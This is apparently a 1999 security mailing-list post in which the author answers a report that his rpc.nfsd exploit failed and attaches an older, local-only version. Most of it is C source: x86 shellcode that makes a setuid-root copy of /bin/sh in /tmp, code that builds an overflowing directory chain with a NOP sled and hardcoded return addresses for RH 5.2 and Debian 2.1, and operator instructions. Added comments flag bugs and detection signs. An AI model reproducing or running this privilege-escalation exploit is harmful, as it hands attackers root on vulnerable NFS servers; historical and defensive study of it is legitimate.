
Re: rpc.nfsd exploit code


From: tmogg () ZIGZAG PL (Mariusz Marcinkiewicz)
Date: Fri, 12 Nov 1999 09:07:02 +0100


Hi

On Thu, 11 Nov 1999, Crispin Cowan wrote:

We were unable to get this sploit to actually produce a root shell on an
unprotected nfsd.

Sorry, this version of the exploit wasn't tested well. It may not work
in some cases.

I attached an old version of the rpc.nfsd exploit. This one is local only;
the shellcode will do "chown root /tmp/blah; chmod +s /tmp/blah". It should
work for you.

best regards,
        tmoggie

__
Mariusz Marcinkiewicz | phone: +48 601 080 286 | mail: many () rast lodz pdi net
System Administrator && Tech Support  <tmogg () zigzag pl>  http://www.zigzag.pl
Security Advisor [*] tmogg () hert org || tmogg () hack dk  [*] http://www.hert.org


/*
 * rpc.nfsd exploit for Linux
 * 
 * author: tmoggie
 * greetz: 
 *         DiGiT - bug discovering, 
 *         kil3r, maxiu and all of lam3rZ GrP
 *                                  
 */  

#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define green "\E[32m"
#define bold "\E[1m"
#define normal "\E[m"
#define red "\E[31m"

// shellcode from maxiu
// chmod 4777 /tmp/blah
// Raw x86 Linux machine code (int 0x80 syscalls -- the \xcd\x80 bytes) that
// main() embeds inside a single directory name.  A path component cannot
// contain a NUL or a '/', which is consistent with the body having neither
// (the only '/' is the deliberate last byte) and with the target being
// spelled ".tmp.blah" -- presumably fixed up at runtime by the code itself;
// not verified here.
// Defender note: the end result is a setuid-root copy of /bin/sh at
// /tmp/blah (see `cmd` below); a setuid binary appearing under /tmp is the
// artefact to alert on.
char shell[] = "\xeb\x2d\x5e\xfe\x06\xfe\x46\x04\xfe\x46\x09\x31\xc9\x31\xdb"
               "\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x89\xf3\xb0\x10\xcd\x80\x66"
               "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x31\xdb\x89\xd8\xfe\xc0"
               "\xcd\x80\xe8\xce\xff\xff\xff.tmp.blah\xff\xff\xff\xff/";     

// Command handed to system() by main() before the directory tree is built;
// it runs as the invoking user, not as root.  `-c` replaces it.
// NOTE: this points at a string literal, yet main() does strcpy(cmd, optarg)
// into it -- writing to a string literal is undefined behaviour and faults
// on systems that map .rodata read-only.
char *cmd = "cp /bin/sh /tmp/blah";

// Length of the export-directory prefix including its trailing '/'.
// Assigned only in main(), where it shortens one path component by the
// prefix length (presumably to keep the total path length independent of
// where the export lives -- confirm).  No other user is visible here.
int offset;


// Print the command-line help and terminate with status 0.
// `prog` is argv[0], echoed in the first line.  Note that the -t legend
// printed here (1 = RH 5.2, 2 = Debian 2.1) is the reverse of the inline
// comments next to the -t cases in main(); which one is right cannot be
// told from this listing.
void usage(char *prog)
{
    // Lines after the first carry no format arguments, so they are emitted
    // through a "%s" format rather than as bare format strings.
    static const char *const help[] = {
        "\n   -e dir    : full path to exported directory\n",
        "   -t target : ",
        "1 - RH 5.2 (default)   2 - Debian 2.1\n",
        "   -c command: cmd to do as a normal user (default: cp /bin/sh /tmp/blah)\n\n",
    };
    printf("\nusage: %s <-e dir> [-t target] [-c command] \n", prog);
    for (size_t k = 0; k < sizeof help / sizeof help[0]; k++) {
        printf("%s", help[k]);
    }
    exit(0);
}

// Entry point.  Flow, as the code stands:
//   1. parse -e/-c/-t/-h with getopt();
//   2. run `cmd` through system() as the current user;
//   3. under the exported directory `exp`, mkdir() a chain of components:
//      three of 255 'A's, one of (255 - strlen(exp)) 'A's, one of 0x90
//      filler with `shell` at its tail, and one of 'a's carrying `addr`
//      at bytes 93..96;
//   4. print a follow-up instruction for the operator (not executed here).
// Only the on-disk layout is produced by this file; the nfsd side of the
// attack is not in it.
//
// Review notes (defects visible in this listing, left as they are):
//   * `void main` is a non-standard return type.
//   * printf/exit/atoi/system are used with no <stdio.h>/<stdlib.h>
//     include -- implicit declarations.
//   * see the inline comments on the -t fall-through, the strcpy() into a
//     string literal, the unbounded strcpy() into exp[255], and the stray
//     '%' sequences in the "offset dir" message.
// Detection angle: the artefact is a deep directory chain with 255-byte
// single-character names and a component full of 0x90 bytes inside an NFS
// export, plus a setuid copy of /bin/sh in /tmp (see `cmd`).
void main(int argc, char **argv) 
 {
  int i,j;              // i: getopt() result, later a loop counter; j: parsed -t value
  char buf[4096];       // the full path being built, one component at a time
  char buf2[4096];      // unused
  char tmp[4096];       // scratch for the current path component

  char exp[255] = "!";  // "!" is a sentinel meaning "-e not given" (checked below)
  int addr = 0xbffff667 ; // default RH 5.2 
  // NOTE: the comments on the two -t cases below label 0xbffff667 as
  // "debian 1.2" -- the opposite of this comment and of the usage() text.
  
  while (1)
   {
     i = getopt(argc,argv,"e:c:t:h");
     if (i == -1) break;
     switch (i) 
      {
       // unbounded copy of a command-line argument into a 255-byte buffer
       case 'e': strcpy(exp,optarg); break;
       // cmd points at a string literal (see its definition): writing to it is UB
       case 'c': strcpy(cmd,optarg); break;
       // There is no `break` after the inner switch, so every -t falls
       // into `default` below and the program ends in usage()/exit(0).
       case 't': switch (j=atoi(optarg))
                   {
                     case 1: addr = 0xbffff667; break; // debian 1.2
                     case 2: addr = 0xbffff655; break; // rh 5.2
                   }
       default : usage(argv[0]); break;
      }
   }
  if (!strcmp(exp,"!")) usage(argv[0]);   // -e is mandatory
  printf(bold"cmd"); 
  // Step 2: runs with the caller's own privileges -- nothing elevated yet.
  if (system(cmd) != 0)
    {
      printf(red"....failed!\n"normal);
      exit(-1);
    }
  printf(normal green"\tOk\n"normal);
  
  // Make sure exp ends with '/'.  exp[offset-1] is out of bounds when exp
  // is "", and strcat() can overrun exp[255] by one byte when it is full.
  offset = strlen(exp);
  if (exp[offset-1] != '/') strcat(exp,"/");
  offset = strlen(exp);
  // buf := exp.  buf is zeroed first, so the terminator strncpy() does not
  // copy (it copies exactly strlen(exp) bytes) is already there.
  bzero(buf,sizeof(buf));
  memset(tmp,'A',255);
  tmp[255]='/';
  tmp[256]='\0';
  strncpy(buf,exp,offset);
  printf(bold"dirs");
  // Step 3a: three components of 255 'A's.
  for (i=1;i<=3;i++)    
   { 
    strncat(buf,tmp,strlen(tmp));  
    if (mkdir(buf,0777) < 0)
      {
       printf(red"...fuck! can't create directory!!! : %d\n"normal,i);
       exit(-1);
      }
   }   
  // Step 3b: one component shortened by the prefix length -- presumably so
  // the overall path length does not depend on the export path; confirm.
  memset(tmp,'A',255);
  tmp[255-offset]='/';
  tmp[256-offset]='\0';
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {
    // BUG: this literal contains '%' sequences ("%#$", "%T") with no
    // arguments -- undefined behaviour in printf(); escape as "%%".
    printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal);
    exit(-1);
   } 
  // Step 3c: a 255-byte component of 0x90 filler with `shell` right-aligned
  // at its end (shell's own trailing '/' becomes the separator).
  memset(tmp,'\x90',255);
  strcpy(tmp+(255-strlen(shell)),shell); 
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {
    printf(red"...fuck!@# shell-dir\n"normal);
    exit(-1);
   } 
  // Step 3d: a 97-byte component of 'a' with the 4-byte `addr` overlaid at
  // bytes 93..96.  The cast write is unaligned/type-punned -- works on x86
  // in practice, UB by the standard (memcpy would be the portable form).
  memset(tmp,'a',255);
  tmp[97] = '\0'; 
  *((int*)(tmp+93)) = addr;
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {      
    printf(red"...fuck!@#!@#!$ addrez-dir ^\n"normal);
    exit(-1);
   } 
  printf(normal green"\tOk\n"normal);
  // Step 4: the follow-up command is only printed, never run by this program.
  printf("now you have to do: "bold green \
         "rm -rf /path-to-mount-point/A[tab] & \n\n"normal);
}

